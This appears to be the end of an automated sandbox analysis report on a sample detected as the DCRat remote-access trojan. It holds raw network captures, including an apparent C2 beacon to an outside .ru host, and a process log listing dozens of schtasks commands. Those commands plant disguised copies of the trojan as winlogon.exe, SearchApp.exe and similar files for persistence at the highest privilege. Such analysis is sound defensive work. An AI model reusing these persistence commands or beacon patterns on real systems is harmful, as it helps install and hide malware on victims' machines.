                              Aug 31, 2024 09:22:11.861401081 CEST1236INData Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61
                              Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
                              Aug 31, 2024 09:22:11.861423016 CEST1236INData Raw: 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 6c 6f 6e 67 2d 6c 6f 67 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72
                              Data Ascii: ntent .footer__long-logo{max-width:188px;max-height:32px}.wrapper .content .footer__text{color:#000;font-size:14px;line-height:138%;margin-bottom:16px;white-space:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-h
                              Aug 31, 2024 09:22:11.861432076 CEST1236INData Raw: 31 30 30 70 78 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e
                              Data Ascii: 100px}}</style></head><body> <div class="wrapper"> <div class="content"> <div class="left-side"> <div class="error-block"> <p class="error-bl
                              Aug 31, 2024 09:22:11.861443043 CEST1236INData Raw: 32 20 37 33 2e 30 37 33 38 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 43 31 39 35 2e 33 33 36 20 36 38 2e 31 30 39 36 20 31 39 32 2e 32
                              Data Ascii: 2 73.0738Z" fill="black"/> <path d="M196.292 64.6725C195.336 68.1096 192.276 70.401 189.024 71.3558C184.816 72.5015 180.226 71.3558 176.209 69.8282C175.062 69.4463 174.488 71.3558 175.636 71.7377C180.226 73.2653 185.199 74.602 189.98 7
                              Aug 31, 2024 09:22:11.861468077 CEST1236INData Raw: 31 39 33 20 31 30 32 2e 36 37 32 43 31 37 33 2e 33 34 20 31 30 33 2e 30 35 34 20 31 37 33 2e 39 31 34 20 31 30 31 2e 31 34 34 20 31 37 32 2e 37 36 37 20 31 30 30 2e 37 36 32 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20
                              Data Ascii: 193 102.672C173.34 103.054 173.914 101.144 172.767 100.762Z" fill="black"/> <path d="M141.208 97.1331C138.721 99.8064 136.044 102.098 133.175 104.389C132.792 104.771 132.792 105.344 133.175 105.726C133.557 106.108 134.131 106.108 134.5
                              Aug 31, 2024 09:22:11.861483097 CEST1000INData Raw: 2e 38 31 36 20 31 31 31 2e 36 34 37 20 33 31 31 2e 32 34 32 20 31 31 31 2e 30 37 34 20 33 31 30 2e 36 36 39 20 31 31 30 2e 38 38 33 43 33 30 38 2e 37 35 36 20 31 31 30 2e 36 39 32 20 33 30 37 2e 30 33 35 20 31 31 30 2e 35 30 31 20 33 30 35 2e 31
                              Data Ascii: .816 111.647 311.242 111.074 310.669 110.883C308.756 110.692 307.035 110.501 305.122 110.31C306.652 108.974 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296
                              Aug 31, 2024 09:22:11.861500025 CEST1236INData Raw: 39 2e 34 36 31 20 34 32 2e 33 33 32 31 20 31 37 34 2e 31 30 35 20 34 33 2e 36 36 38 38 43 31 36 38 2e 31 37 36 20 34 35 2e 30 30 35 34 20 31 36 31 2e 38 36 34 20 34 34 2e 38 31 34 35 20 31 35 35 2e 37 34 34 20 34 34 2e 32 34 31 36 43 31 35 37 2e
                              Data Ascii: 9.461 42.3321 174.105 43.6688C168.176 45.0054 161.864 44.8145 155.744 44.2416C157.274 40.4226 159.761 36.9855 163.203 34.6941C163.968 34.1213 163.586 32.5937 162.438 32.9756C157.083 35.076 152.11 37.9403 147.902 41.9502C147.902 38.7041 147.902
                              Aug 31, 2024 09:22:11.861538887 CEST1236INData Raw: 34 39 33 39 20 31 34 34 2e 36 38 31 20 35 35 2e 37 31 32 33 20 31 33 39 2e 35 32 36 43 35 33 2e 32 32 35 39 20 31 33 36 2e 38 35 33 20 34 38 2e 30 36 31 37 20 31 33 30 2e 39 33 33 20 34 37 2e 38 37 30 35 20 31 33 30 2e 39 33 33 43 34 35 2e 39 35
                              Data Ascii: 4939 144.681 55.7123 139.526C53.2259 136.853 48.0617 130.933 47.8705 130.933C45.9578 127.687 43.8539 126.541 41.75 124.441C39.0723 121.958 39.0723 117.758 39.0723 114.32C39.0723 113.557 38.3072 113.175 37.5421 113.557C34.6732 115.084 32.9518 1
                              Aug 31, 2024 09:22:11.866261005 CEST1236INData Raw: 31 32 39 20 31 37 35 2e 38 30 36 20 39 35 2e 34 39 35 35 20 31 37 36 2e 33 37 39 43 39 36 2e 34 35 31 38 20 31 37 37 2e 35 32 35 20 39 37 2e 34 30 38 31 20 31 37 38 2e 34 38 20 39 38 2e 37 34 37 20 31 37 39 2e 30 35 33 43 39 39 2e 31 32 39 35 20
                              Data Ascii: 129 175.806 95.4955 176.379C96.4518 177.525 97.4081 178.48 98.747 179.053C99.1295 179.243 99.512 179.625 99.8946 179.625C100.086 179.625 100.086 179.625 100.277 179.625C100.66 179.625 101.042 179.625 101.233 179.434C101.807 179.434 102.19 179.
                              Aug 31, 2024 09:22:12.098903894 CEST453OUTGET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1
                              Accept: */*
                              Content-Type: text/css
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                              Host: a1023624.xsph.ru
                              Aug 31, 2024 09:22:12.312961102 CEST1236INHTTP/1.1 403 Forbidden
                              Server: openresty
                              Date: Sat, 31 Aug 2024 07:22:12 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Vary: Accept-Encoding
                              Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                              Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:03:21:51
                              Start date:31/08/2024
                              Path:C:\Users\user\Desktop\5P9EdUgv5r.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\5P9EdUgv5r.exe"
                              Imagebase:0xd60000
                              File size:1'577'715 bytes
                              MD5 hash:1F70E167B93D471AF9DAF333145DB4CD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:03:21:51
                              Start date:31/08/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe"
                              Imagebase:0xef0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:2
                              Start time:03:22:02
                              Start date:31/08/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:03:22:02
                              Start date:31/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:03:22:02
                              Start date:31/08/2024
                              Path:C:\serversessionmonitor\blockfont.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\serversessionmonitor\blockfont.exe"
                              Imagebase:0xf50000
                              File size:1'260'544 bytes
                              MD5 hash:960DC58A366579A52C966ACC596733B6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1784999674.0000000003657000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1784999674.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1790371382.00000000132BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 88%, ReversingLabs
                              • Detection: 68%, Virustotal, Browse
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:7
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:11
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 9 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:12
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:13
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:14
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:15
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:16
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:18
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:19
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:20
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
                              Imagebase:0x9f0000
                              File size:1'260'544 bytes
                              MD5 hash:960DC58A366579A52C966ACC596733B6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1870320993.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1870320993.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 88%, ReversingLabs
                              • Detection: 68%, Virustotal, Browse
                              Has exited:true

                              General

                              Target ID:21
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:22
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe"
                              Imagebase:0xcd0000
                              File size:1'260'544 bytes
                              MD5 hash:960DC58A366579A52C966ACC596733B6
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.1870704533.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.1870704533.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 88%, ReversingLabs
                              • Detection: 68%, Virustotal, Browse
                              Has exited:true

                              General

                              Target ID:23
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:25
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:27
                              Start time:03:22:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:28
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SearchApp.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:29
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:30
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:31
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:32
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:33
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:34
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:35
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:36
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:37
                              Start time:03:22:06
                              Start date:31/08/2024
                              Path:C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe"
                              Imagebase:0xdc0000
                              File size:1'260'544 bytes
